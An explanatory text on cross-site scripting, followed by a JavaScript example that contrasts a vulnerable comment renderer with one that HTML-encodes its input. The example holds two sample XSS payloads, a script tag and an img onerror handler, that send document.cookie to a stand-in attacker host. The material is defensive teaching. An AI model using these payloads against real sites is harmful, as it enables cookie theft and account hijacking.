Cross-site scripting (XSS) is a vulnerability of Web pages that build their content dynamically from user-supplied data. Sites use dynamic content to adapt pages to a user's interests or needs, and providing it requires the site to accept input from users. A malicious user can hide script code in that input; if the site inserts the input into a page without encoding it for the context where it lands, the code is delivered to other, unsuspecting users along with the data they legitimately requested. Once such a script "crosses" over to the victim's browser, it runs with the site's privileges in that user's session and can perform various misdeeds, such as hijacking accounts or injecting fraudulent advertisements.
The four major threats posed by this vulnerability are:
- phishing attacks
- delivering exploits for vulnerabilities in the user's browser
- site hijacking
- stealing the user's cookies, which can in turn lead to session hijacking
Attackers inject code in any of the languages a browser will interpret, such as JavaScript, VBScript, or even ActiveX, Flash or plain HTML, to obtain the data they want from users. Such an injection can embed a script in a page that is executed every time the page is loaded, or whenever an associated event (such as a click, or an image failing to load) fires. Once this has been achieved the attacker can hijack the account, tamper with the user's settings, steal or poison cookies, or even serve advertisements of their own.
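The mechanism described above, as an added example that is not part of the original page: a minimal comment renderer that concatenates untrusted input straight into HTML, beside a hardened version that encodes the input for the HTML text context first. The two attacker payloads are constructed here to show the two shapes the text mentions, a script that runs when the page loads and one that runs on an event (`onerror`); the function and host names are hypothetical.

```javascript
// Added example (not from the original page): a vulnerable comment renderer
// and its fix via HTML output encoding. All inputs are constructed sample data.

// Vulnerable: untrusted text is concatenated straight into the page's HTML,
// so any tags or event handlers in it are interpreted by the victim's browser.
function renderCommentVulnerable(author, text) {
  return `<div class="comment"><b>${author}</b>: ${text}</div>`;
}

// Encode the five characters that can change HTML text or (quoted) attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Hardened: every untrusted value is encoded before it is placed in the markup,
// so the browser renders the payload as literal text instead of executing it.
function renderCommentSafe(author, text) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(text)}</div>`;
}

// Rough illustrative check: does the rendered HTML contain a <script> tag,
// an inline on* event handler, or a javascript: URL? (A deliberately simple
// regex; a real audit would parse the markup instead.)
function containsActiveContent(html) {
  return /<script\b|<\w+[^>]*\son\w+\s*=|javascript:/i.test(html);
}

// Constructed attacker payloads: one fires on page load, one on an event.
// attacker.example is a hypothetical collection host.
const PAYLOADS = [
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
  '<img src=x onerror="location=\'https://attacker.example/?c=\'+document.cookie">',
];

// For each payload, report whether the vulnerable and the hardened renderer
// produce markup the browser would execute.
function demo() {
  return PAYLOADS.map((p) => ({
    payload: p,
    vulnerableHasScript: containsActiveContent(renderCommentVulnerable('mallory', p)),
    safeHasScript: containsActiveContent(renderCommentSafe('mallory', p)),
  }));
}

console.log(demo());
```

`escapeHtml` is only correct for the HTML text context and for attribute values that are enclosed in quotes; data that lands inside a URL, a `<script>` block, or a CSS rule needs an encoder for that context instead. Marking session cookies `HttpOnly` additionally keeps `document.cookie` out of reach of an injected script, which blunts the cookie-theft case listed above even when encoding is missed.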
XSS attacks are mainly used for identity or sensitive-data theft and for defacing a corporation's site or Web application. They can also be used for denial of service, simply by running a script that blocks use of the dynamic content on the page.
Cross-site scripting is sometimes abbreviated CSS, but this has been largely replaced by the acronym XSS to avoid confusion with cascading style sheets, which are also abbreviated CSS. CSS is a powerful tool used in defining the style (layout, font, color, etc.) of a Web site.